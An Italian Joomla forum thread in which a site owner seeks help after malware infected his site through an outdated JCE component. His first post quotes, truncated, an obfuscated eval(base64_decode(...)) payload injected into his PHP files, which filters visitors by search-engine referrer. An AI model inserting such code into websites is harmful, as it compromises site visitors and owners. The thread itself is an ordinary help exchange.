Autore Topic: Malware sul mio sito (Letto 2566 volte)

sdenghete · « **il:** 05 Mar 2013, 19:26:25 »

Direte: ecco l'ennesimo attaccato dal Malware.
L'ho scoperto oggi dopo che google me lo ha comunicato. (ma il fatto risale al 11 gennaio scorso)
Il server che mi ospita (joomlahost) mi ha detto che alcuni file contengono questa stringa:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1 oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew 0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGR VJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VT RVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZ lcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZm VyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlc mVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVm ZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmV yZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZW ZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZ mVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVm ZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJ lZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb 3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikg b3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5 jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC 5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbS

Ho aperto e pulito tutti quelli presenti nella cartella Includes come indicatomi ma facendo la scansione con il programma online risulta che il codice è ancora presente.
Il mio backup risale a Aprile 2012 e se ripristino da questo, perdo tutto il lavoro che sto facendo sul Jupgrade.
Che faccio? urge un aiuto colossale sennò stasera mi suicido! $:-\$
Grazie a tutti

hapax · « **Risposta #1 il:** 05 Mar 2013, 19:39:02 »

Citazione da: sdenghete - 05 Mar 2013, 19:26:25

Che faccio? urge un aiuto colossale sennò stasera mi suicido! $:-\$

...per così poco...

hai controllato se all'interno del file index.php è presente quel codice

o qualcosaltro che lo richiami

...per curiosità...che versione di joomla utilizzi?

ciao

sdenghete · « **Risposta #2 il:** 05 Mar 2013, 19:54:06 »

ciao, sembra poco, sono nel pallone più totale, credimi.
uso questa versione 1.5.26
L'ho trovato ancora in altri file....mannaggia :-(
ora provo di nuovo con la scansione

sdenghete · « **Risposta #3 il:** 06 Mar 2013, 19:32:19 »

due giorni da massacro. Non so quanti files .php controllati. Un lavoro immane....
Il reparto tecnico di Joomlahost mi ha detto che:
La violazione è avvenuta da un componente JCE non aggiornato. Le consigliamo di installare il componente JCE versione 2.3.1 unica stabile

Ho fatto l'upgrade alla 2.3.1.1, speriamo che google mi riabiliti al più presto!!!!

mau_develop · « **Risposta #4 il:** 06 Mar 2013, 19:43:20 »

http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html
... c'è anche quello, bisognerebbe frequentare e leggere non solo quando si hanno dei problemi

sdenghete · « **Risposta #5 il:** 06 Mar 2013, 19:54:27 »

è verissimo, ma bisogna avere una giornata di 36 ore per fare tutto bene, il lavoro, il sito.....

hapax · « **Risposta #6 il:** 08 Mar 2013, 13:14:26 »

Citazione da: sdenghete - 06 Mar 2013, 19:32:19

Ho fatto l'upgrade alla 2.3.1.1, speriamo che google mi riabiliti al più presto!!!!

...hai richiesto da "strumenti webmatser" di google la riconsiderazione del sito?

Citazione da: sdenghete - 06 Mar 2013, 19:54:27

è verissimo, ma bisogna avere una giornata di 36 ore per fare tutto bene, il lavoro, il sito.....

...anche con una da 24...basta iscriversi alla newsletter del sito
e ricevere direttamente nella casella di posta...tutte le notizie
..tra cui quella linkata da @M_W_C

ciao

Autore Topic: Malware sul mio sito (Letto 2566 volte)

sdenghete

Malware sul mio sito

hapax

Re:Malware sul mio sito

sdenghete

Re:Malware sul mio sito

sdenghete

Re:Malware sul mio sito

mau_develop

Re:Malware sul mio sito

sdenghete

Re:Malware sul mio sito

hapax

Re:Malware sul mio sito